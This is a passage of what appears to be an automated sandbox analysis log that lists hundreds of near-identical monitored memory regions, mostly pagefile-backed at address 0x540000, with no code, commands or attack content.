pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4640 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4641 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4642 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4643 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4644 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4645 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4646 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4647 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4648 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4649 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4650 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4651 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4652 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4653 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4654 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4655 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4656 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4657 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4658 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4659 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 4660 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 4661 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4662 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4663 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4664 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4665 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4666 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4667 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4668 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4669 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4670 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4671 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4672 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4673 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4674 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4675 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4676 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4677 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4678 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4679 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4680 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4681 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4682 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4683 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4684 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4685 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4686 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4687 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4688 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4689 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4691 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4692 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4693 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4694 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4695 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4696 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4697 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4698 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4699 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4700 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4701 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4702 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4703 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4704 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4705 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4706 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4707 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4708 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4709 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4710 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4711 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4712 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4713 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4714 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4715 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4716 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4717 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4718 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4719 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4720 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4721 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4722 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4723 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4724 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4725 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4726 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4727 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4728 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4729 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4730 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4731 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4732 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4733 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4734 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4735 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4736 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4737 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4738 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4739 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4740 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4741 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4742 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4743 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4744 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4745 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4746 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4747 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4748 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4749 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4750 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4751 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4752 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4753 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4754 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4755 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4756 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4757 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4758 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4759 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4760 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4761 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4762 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4764 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4765 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4766 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4767 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4768 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4769 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4770 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4771 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4772 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4773 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4774 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4775 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4776 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4777 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4780 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 4781 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 4782 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4783 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4784 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4785 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4786 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4787 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4788 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4789 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4790 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4792 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4793 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4794 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4795 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4796 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4797 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4798 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4799 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4800 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4801 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4802 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4803 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4804 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4805 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4806 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4807 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4808 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4809 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4811 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4812 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4813 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4814 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4815 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4816 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4817 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4818 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4819 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4820 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4821 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4822 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4823 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4824 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4825 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4826 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4827 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4828 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4829 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4830 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4831 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4836 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4837 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 